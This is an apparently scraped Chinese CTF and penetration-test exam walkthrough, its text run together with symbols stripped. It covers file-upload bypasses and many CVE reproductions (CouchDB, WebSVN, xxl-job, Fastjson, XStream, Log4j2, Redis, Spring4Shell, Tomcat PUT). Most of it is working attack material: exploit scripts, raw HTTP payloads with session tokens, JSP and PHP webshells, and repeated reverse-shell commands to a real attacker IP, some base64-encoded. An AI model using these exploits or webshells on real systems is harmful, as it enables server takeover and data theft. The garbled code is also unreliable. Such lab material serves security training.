流量最大的网站,房产最新消息今天新闻,wordpress应用下载主题,网页制作ppt教学课件免责声明#xff1a;本文仅用于学习和研究目的#xff0c;不鼓励或支持任何非法活动。所有技术内容仅供个人技术提升使用#xff0c;未经授权不得用于攻击、侵犯或破坏他人系统。我们不对因使用本文内容而引起的任何法律责任或损失承担责任。 注#xff1a;此文章为快速通关… 免责声明本文仅用于学习和研究目的不鼓励或支持任何非法活动。所有技术内容仅供个人技术提升使用未经授权不得用于攻击、侵犯或破坏他人系统。我们不对因使用本文内容而引起的任何法律责任或损失承担责任。 注此文章为快速通关方法不全细节等还需自己多看文献·详解。 GPT 需要请看文章末. 综合起来题目比较简单多cve复现。感谢A.M.对本文的大力付出。 目录
资料
真题模拟
1php代审
2路径穿越
3日志包含
4md5弱比较
5md5强类型
6登录框-密码爆破
7登录框-万能密码
8登录框-sql注入
文件上传场景
upload1--前端js
2-.htaccess绕过
3-MIME校验(后端
4-文件头MIME
5-文件名删除
6-文件名替换
7-%00截断
8-空字符截断
9-黑名单绕过
10-条件竞争
11-二次渲染
12-/.绕过后缀检测
13-数组绕过
VIP
2014-4210 (weblogic 弱口令 加 上传
junams
drupal
yapi
2018-1273
CouchDB
Websvn
Nostromo
xxl-job
jmeter
fastjson
xstream ???
log4j2 ????
场景靶场
镜像站
CodeExec
接口功能
Redis
redis你猜
PUT
XXE
挺难的!
WEB
52
redis-Lua
flink
weblogic
SpringFramework
L4
禅道CMS
cve-2019-9978
猫咪cve-2020-13935 题重
广x 资料
360 Phone N6 Pro内核漏洞 - Wiki seacms:
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721_cnvd-2020-22721-CSDN博客 真题模拟
1php代审
MS08067喊你来找Flag了
your key: titleCheckMe-01/title
?php
print(h1MS08067喊你来找Flag了/h1);
?
form actionindex.php methodPOSTyour key: input typetext namekey /input typesubmit valueSubmit /
/form
?php
if(!empty($_POST[key])){$keys $_POST[key];show_source(index.php);$keys base64_decode(urldecode($keys));if(strlen($keys)6){if($keysctfctf){print(pYou win!/p);include(flag.php);print($flag);}}else{print(末心大漏特漏此乃九年义务教育漏网之鱼。);}
}
?
Y3RmY3Rm 2路径穿越
欢迎来到CheckMe-02快来寻找你的Flag并提交吧。
flag{6de32f81-5388-4baa-a7a3-01f1d0d4ece0} ?php include($_GET[url]);? 3日志包含
?php include($_GET[text]);?
包含日志---webshell
env
set 4md5弱比较
?php $flag;$a$_GET[a];$b$_GET[b];if(isset($a) isset($b)){if(!ctype_alpha($a)){die(a error);}if(!is_numeric($b)){die(b error);}if(md5($a)md5($b)){echo $flag;}}else{ echo 请问flag在哪里;}?
md5弱比较
总结ctf中 MD5 绕过的一些思路_ctf md5绕过-CSDN博客
a为字母
b为数字 5md5强类型
md5强类型绕过
?php$a$_GET[a];$b$_GET[b];if($a!$b md5($a)md5($b)){echo($flag);}?
a%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a26登录框-密码爆破
admin
密码xxxxxxxxx全数字
密码爆破就完了 7登录框-万能密码
万能密码
admin#
密码随便输 8登录框-sql注入
sqlmap post time-blind 文件上传场景
来源国光文件上传靶场
1-13
国光文件上传靶场 WriteUp | lololowe的博客 upload1--前端js
过前端js检测就 function checkfilesuffix()
{var filedocument.getElementsByName(file)[0][value];if(file||filenull){swal(请添加上传文件, , error);return false;}else{var whitelistnew Array(.jpg,.png,.gif,.jpeg);var file_suffixfile.substring(file.lastIndexOf(.));if(whitelist.indexOf(file_suffix) -1){swal(只允许上传图片类型的文件!, , error);return false;}}
}function error(){swal(上传失败, , error);
}禁用js上传php/上传jpg后缀抓包改jpg为php过前端验证即可。 2-.htaccess绕过
题目黑名单
.htaccess文件是Apache服务器特有的配置文件默认启用用于配置Apache服务器具体用法可以参看此文章https://xz.aliyun.com/t/8267?time__1311n4%2BxnD0Dc7exyDjxYqGNWP4IrVnuYA5GCzReD其中我们可以利用到的.htaccess文件指令是AddHandler(SetHandler指令也可利用但稍微长一些具体用法参看刚提到的文章)可以将特定的文件格式与特定的MIME类型进行绑定例如将.jpg文件与application/x-httpd-php进行绑定这样Apache服务器在解析.jpg文件时就会将其当作php文件进行解析。上传 .htaccess
# 将 .phps .php3p .png .jpg .gif 当做 PHP 文件解析
AddType application/x-httpd-php .phps .php3p .png .jpg .gif再上传shell.jpg 等等即可 解析为php3-MIME校验(后端
image/jpeg
image/png
image/gif
image/jpg上传shell.php文件bp抓包将MIME类型由application/octet-stream改为image/jpeg即可成功上传
/上传shell.jpg image/jpg 改后缀为 php 4-文件头MIME
MIME类型
image/jpeg
image/jpg
image/png
image/gif文件头及对应的文件格式
89504E47 -- .png
FFD8FFE0 -- .jpg
47494638 -- .gif copy pic.png/b shell.php/a shell.png
图片马5-文件名删除
shell.php --- shell.
shell.phphpp -- shell.php 6-文件名替换 shell.pphphp --- shell.p hp shell.PHP
xxxxxxxxxxxxxxxxxxxxxxxxx 7-%00截断 8-空字符截断 %00 再url-de 9-黑名单绕过 shell.php5 10-条件竞争
payload
?php fputs(fopen(shell.php,w),?php eval($_REQUEST[1]);?);??php fputs(fopen(xiao.php,w),?php eval($_REQUEST[1]);?);? # coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutordef td(list):url http://110.42.47.105:17373file {upload_file: (szm.php, ?php fputs(fopen(shell.php,w),?php eval($_POST[1]);?); ?)}data {submit: Upload}r requests.post(urlurl, datadata, filesfile)re requests.get(http://110.42.47.105:17373/upload/shell.php)if re.status_code 200:print(上传成功)if __name__ __main__:with ThreadPoolExecutor(20) as p:p.map(td, range(200000))
xxxxxxxxxxxxxxxxxxxxxxxx 11-二次渲染 http://110.42.47.105:17953/?file./upload/1946210678.gifgif 12-/.绕过后缀检测 13-数组绕过
copy 1.jpg/b2.php 3.jpg
本题主要考察代码审计涉及到MIME验证白名单上传路径可控
源码如下
$is_upload false;
$msg null;
if(!empty($_FILES[upload_file])){ //检查MIME $allow_type array(image/jpeg,image/png,image/gif); if(!in_array($_FILES[upload_file][type],$allow_type)){ $msg 禁止上传该类型文件!; }else{ //检查文件名 $file empty($_POST[save_name]) ?
$_FILES[upload_file][name] : $_POST[save_name]; if (!is_array($file)) { $file explode(., strtolower($file)); } $ext end($file); $allow_suffix array(jpg,png,gif); if (!in_array($ext, $allow_suffix)) { $msg 禁止上传该后缀文件!; }else{ $file_name reset($file) . . . $file[count($file) - 1]; $temp_file $_FILES[upload_file][tmp_name]; $img_path UPLOAD_PATH . / .$file_name; if (move_uploaded_file($temp_file, $img_path)) {
$msg 文件上传成功;
$is_upload true;
} else {
$msg 文件上传失败;
}
}
}
}else{
$msg 请选择要上传的文件;
} 例如上传upload.php.jpg
就会返回数组
array(3){
[0]upload,
[1]php,
[2]jpg
} – 判断数组最后一个元素是否在白名单中
因此可利用数组构造最后一个元素为白名单内的后缀(jpg,png,gif) VIP
2014-4210 (weblogic 弱口令 加 上传
Weblogic漏洞复现之SSRFCVE-2014-4210 flag在环境变量
Weblogic SSRF漏洞(CVE-2014-4210)漏洞复现 - 哔哩哔哩 /uddiexplorer/SearchPublicRegistries.jsp?rdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearchoperatorhttp://172.18.0.1:6379weblogic
ssrf bot ! 内网ip我是真不知道。
弱口令webshell 弱口令 weblogic Oracle123
大体上传流程 渗透测试-Weblogic后台部署War大马_创建war大马-CSDN博客
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload 上传成功访问 /21/21.jsp 连马子即可。 junams
junams 文件上传 CNVD-2020-24741复现-CSDN博客 drupal
Drupal 远程代码执行漏洞CVE-2019-6339简单复现 - Mke2fs - 博客园
Drupal 远程代码执行漏洞CVE-2019-6339goby 秒了 yapi
YAPI是由去哪儿网移动架构组(简称YMFE一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册会导致攻击者注册后执行任意命令。
软件 接口 rce YApi Mock 远程代码执行漏洞 2018-1273
goby 秒了
描述Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下将精心制作的请求参数注入到存在该漏洞的服务器上从而发起远程代码执行攻击。CouchDB
Apache CouchDB是一个开源数据库专注于易用性和成为完全拥抱web的数据库。它是一个使用JSON作为存储格式JavaScript作为查询语言MapReduce和HTTP作为API的NoSQL数据库。应用广泛如BBC用在其动态内容展示平台Credit Suisse用在其内部的商品部门的市场框架Meebo用在其社交平台web和应用程序。EXP:
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget http://your-ip:5984
command rbsh -i /dev/tcp/10.0.0.1/443 01
version 1session requests.session()
session.headers {Content-Type: application/json
}
# session.proxies {
# http: http://127.0.0.1:8085
# }
session.put(target /_users/org.couchdb.user:wooyun, data{type: user,name: wooyun,roles: [_admin],roles: [],password: wooyun
})session.auth HTTPBasicAuth(wooyun, wooyun)command bash -c {echo,%s}|{base64,-d}|{bash,-i} % base64.b64encode(command).decode()
if version 1:session.put(target (/_config/query_servers/cmd), datajson.dumps(command))
else:host session.get(target /_membership).json()[all_nodes][0]session.put(target /_node/{}/_config/query_servers/cmd.format(host), datajson.dumps(command))session.put(target /wooyun)
session.put(target /wooyun/test, data{_id: wooyuntest})if version 1:session.post(target /wooyun/_temp_view?limit10, data{language:cmd,map:})
else:session.put(target /wooyun/_design/test, data{_id:_design/test,views:{wooyun:{map:} },language:cmd})Websvn
Websvn是一个应用软件。一个在线Subversion存储库浏览器WebSVN 2.6.1之前版本存在安全漏洞其search.php?search 参数下过滤不严谨导致RCEEXP:
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305import requests
import argparse
from urllib.parse import quote_plusPAYLOAD /bin/bash -c bash -i /dev/tcp/127.0.0.1/9999 01
REQUEST_PAYLOAD /search.php?search;{};parser argparse.ArgumentParser(descriptionSend a payload to a websvn 2.6.0 server.)
parser.add_argument(target, typestr, helpTarget URL.)args parser.parse_args()if args.target.startswith(http://) or args.target.startswith(https://):target args.target
else:print([!] Target should start with either http:// or https://)exit()requests.get(target REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))print([*] Request send. Did you get what you wanted?) Nostromo
脚本地址GitHub - jas502n/CVE-2019-16278: Directory transversal to remote code execution
./CVE-2019-16278.sh IP地址 端口号 id xxl-job
xxl-job远程命令执行漏洞复现_xxljob漏洞-CSDN博客
POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: echo bash -i /dev/tcp/39.105.154.133/9090 01 /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: chmod x /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: /bin/bash /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}监听---上线。 jmeter
Jmeter RMI 反序列化命令执行漏洞
工具
GitHub - Y4er/ysoserial: ysoserial修改版着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
https://github.com/Y4er/ysoserialjava -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 touch /tmp/success
反弹shell
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85MDkwIDAJjE}|{base64,-d}|{bash,-i} fastjson
Fastjson漏洞复现 - kar3a - 博客园
GitHub - mbechler/marshalsec
创建恶意类 带反弹shell
javac ---- .class
启动http 用工具启动rmi监听9999端口 发包反弹shell拿下。 curl http://27.25.151.24:28493/ -H Content-Type: application/json --data {name:karsa, age:22}// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt Runtime.getRuntime();String[] commands {/bin/bash, -c, bash -i /dev/tcp/39.105.154.133/6666 01};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://39.105.154.133:1337/#TouchFile 9999POC
POST / HTTP/1.1
Host: 27.25.151.24:26795
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160{b:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://39.105.154.133:9999/TouchFile,autoCommit:true}
}xstream ???
CVE-2021-29505 XStream远程代码执行漏洞复现 CVE-2021-21351:XStream反序列化远程代码执行漏洞简析
Xstream反序列化漏洞复现 - Arrest - 博客园
/bin/bash -i /dev/tcp/39.105.154.133/9090 01L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvOTA5MCAwPiYxjava -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 bash -c {echo,L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675
java.util.PriorityQueue serializationcustom unserializable-parents/ java.util.PriorityQueue default size2/size /default int3/int javax.naming.ldap.Rdn_-RdnEntry type12345/type value classcom.sun.org.apache.xpath.internal.objects.XString m__obj classstringcom.sun.xml.internal.ws.api.message.Packet2002fc1d Content/m__obj /value /javax.naming.ldap.Rdn_-RdnEntry javax.naming.ldap.Rdn_-RdnEntry type12345/type value classcom.sun.xml.internal.ws.api.message.Packet serializationcustom message classcom.sun.xml.internal.ws.message.saaj.SAAJMessage parsedMessagetrue/parsedMessage soapVersionSOAP_11/soapVersion bodyParts/ sm classcom.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl attachmentsInitializedfalse/attachmentsInitialized nullIter classcom.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator aliases classcom.sun.jndi.toolkit.dir.LazySearchEnumerationImpl candidates classcom.sun.jndi.rmi.registry.BindingEnumeration names stringaa/string stringaa/string /names ctx environment/ registry classsun.rmi.registry.RegistryImpl_Stub serializationcustom java.rmi.server.RemoteObject stringUnicastRef/string string39.105.154.133/string int4444/int long0/long int0/int long0/long short0/short booleanfalse/boolean /java.rmi.server.RemoteObject /registry host39.105.154.133/host port4444/port /ctx /candidates /aliases /nullIter /sm /message /value /javax.naming.ldap.Rdn_-RdnEntry /java.util.PriorityQueue /java.util.PriorityQueuePOST / HTTP/1.1
Host: 27.25.151.24:27172
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Cookie: _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Referer: http://attck.ms08067.com/
Content-Type: application/xmljava.util.PriorityQueue serializationcustomunserializable-parents/java.util.PriorityQueuedefaultsize2/size/defaultint3/intjavax.naming.ldap.Rdn_-RdnEntrytype12345/typevalue classcom.sun.org.apache.xpath.internal.objects.XStringm__obj classstringcom.sun.xml.internal.ws.api.message.Packet2002fc1d Content/m__obj/value/javax.naming.ldap.Rdn_-RdnEntryjavax.naming.ldap.Rdn_-RdnEntrytype12345/typevalue classcom.sun.xml.internal.ws.api.message.Packet serializationcustommessage classcom.sun.xml.internal.ws.message.saaj.SAAJMessageparsedMessagetrue/parsedMessagesoapVersionSOAP_11/soapVersionbodyParts/sm classcom.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1ImplattachmentsInitializedfalse/attachmentsInitializednullIter classcom.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIteratoraliases classcom.sun.jndi.toolkit.dir.LazySearchEnumerationImplcandidates classcom.sun.jndi.rmi.registry.BindingEnumerationnamesstringaa/stringstringaa/string/namesctxenvironment/registry classsun.rmi.registry.RegistryImpl_Stub serializationcustomjava.rmi.server.RemoteObjectstringUnicastRef/stringstring39.105.154.133/stringint6666/intlong0/longint0/intlong0/longshort0/shortbooleanfalse/boolean/java.rmi.server.RemoteObject/registryhost39.105.154.133/hostport6666/port/ctx/candidates/aliases/nullIter/sm/message/value/javax.naming.ldap.Rdn_-RdnEntry/java.util.PriorityQueue
/java.util.PriorityQueuejava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -i /dev/tcp/39.105.154.133/9090 01 21 -A 39.105.154.133bash -i /dev/tcp/39.105.154.133/8888 01 21rmi://39.105.154.133:1099/jskfvrjava 1.8 8 11 17 log4j2 ????
https://github.com/welk1 n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 想要执行的命令 -A 攻击机 的ipjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} | {bash,-i} -A 攻击机ipjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy8xMDAwMSAwPiYx} |{base64,-d} | {bash,-i} -A 39.105.154.133${jdni:rmi://39.105.154.133:1099/vacwrg}
使用JNDI-Injection-Exploit.jar工具生成反弹shell (反弹语句bash -i /dev/tcp/xx..xx.88/10001 01) 场景靶场
镜像站
ssrf
CTFHub之Web篇之Web实战之SSRF更新中~~ - AcWing
file协议读取即可 CodeExec
目录扫描
扫出 [12:08:43] 200 - 199B - /shell.php
访问 get cmd 执行命令
?cmdset 接口功能
ping Redis
未授权
// 设置key
set xxx \n\n* * * * * bash -i /dev/tcp/39.105.154.133/9090 01\n\n
//添加名为xxx的key值为后面反弹shell的语句,5个星号代表每分钟执行一次其中的\n同样是为了换行避免crontab的语法错误。这里你也可以去不加\n去看看乱码踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了flag{7b992efb5ab23a3a3d5100e366c48423}flag{7b992efb5ab23a3a3d5100e366c48423}http://101.43.64.97:36291/
redis-cli -h 101.43.64.97 -p 36291// 设置key
set xxx \n\n* * * * * bash -i /dev/tcp/39.105.154.133/2333 01\n\n
//添加名为xxx的key值为后面反弹shell的语句,5个星号代表每分钟执行一次其中的\n同样是为了换行避免crontab的语法错误。这里你也可以去不加\n去看看乱码踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了redis你猜
文件包含
/etc/redis.conf PUT
Tomcat任意写入文件漏洞CVE-2017-12615
抓首页包改包改请求方式
PUT /1.jsp/ HTTP/1.1
Host: 101.43.64.97:37944
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell马子。rce
%java.io.InputStream is Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream();int a -1;byte[] b new byte[2048];while ((a is.read(b)) ! -1) {out.print(new String(b));}
% xxxx?cmdenv XXE
登录框 CTF XXE - MustaphaMond - 博客园 挺难的!
mysql WEB
52
cve-2017-5638
struts2-045 远程代码执行漏洞CVE-2017-5638)
随便上传一个文件 url复制过来直接检测 redis-Lua
春秋云境CVE-2022-0543Redis 沙盒逃逸漏洞-CSDN博客
redis-cli -h xxx -p xxx payload:
eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(env, r); local res f:read(*a); f:close(); return res 0 flink
文件上传 jsp
.jar
goby 利用。 weblogic
rce
goby秒了 SpringFramework
Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包是一个包含Spring框架基本的核心工具包Spring其他组件都要使用到这个包。
#!/usr/bin/env python3
#coding:utf-8import requests
import argparse
from urllib.parse import urljoindef Exploit(url):headers {suffix:%//,c1:Runtime,c2:%,DNT:1,Content-Type:application/x-www-form-urlencoded}data class.module.classLoader.resources.context.parent.pipeline.first.pattern%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Diclass.module.classLoader.resources.context.parent.pipeline.first.suffix.jspclass.module.classLoader.resources.context.parent.pipeline.first.directorywebapps/ROOTclass.module.classLoader.resources.context.parent.pipeline.first.prefixtomcatwarclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormattry:go requests.post(url,headersheaders,datadata,timeout15,allow_redirectsFalse, verifyFalse)shellurl urljoin(url, tomcatwar.jsp)shellgo requests.get(shellurl,timeout15,allow_redirectsFalse, verifyFalse)if shellgo.status_code 200:print(f漏洞存在shell地址为:{shellurl}?pwdjcmdwhoami)except Exception as e:print(e)passdef main():parser argparse.ArgumentParser(descriptionSrping-Core Rce.)parser.add_argument(--file,helpurl file,requiredFalse)parser.add_argument(--url,helptarget url,requiredFalse)args parser.parse_args()if args.url:Exploit(args.url)if args.file:with open (args.file) as f:for i in f.readlines():i i.strip()Exploit(i)if __name__ __main__:main() L4
java 版本问题 vps自身防御问题。
log4j2-rce-cve-2021-44228 漏洞复现_log4j2 复现 vps 开放端口-CSDN博客
i6bfpg.dnslog.cn/solr/admin/cores?action${jndi:ldap://rcilyy.dnslog.cn}
${jndi:ldap://${sys:java.version}.rcilyy.dnslog.cn}http://domain/solr/admin/cores?action${jndi:ldap://${sys:java.version}.u8gtb8.dnslog.cn}${jndi:ldap://x❌x❌1389/Basic/Command/Base64/base64命令}
${jndi:ldap://39.105.154.133:1389/Basic/Command/Base64/bHM}pocldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte实际构造${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
——————————
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 39.105.154.133${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}bash -i /dev/tcp/39.105.154.133/9999 01java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85OTk5IDAJjE}|{base64,-d}|{bash,-i} -A 39.105.154.133rmi://39.105.154.133:1099/qxavqn${jndi:rmi://39.105.154.133:1099/2kzlcs}禅道CMS
禅道项目管理软件是国产的开源项目管理软件。 账户密码为admin:123456
禅道CMS文件上传漏洞CNVD-C-2020-121325 准备工作
1、在自己的服务器上创建shell.php
内容为?php phpinfo();?
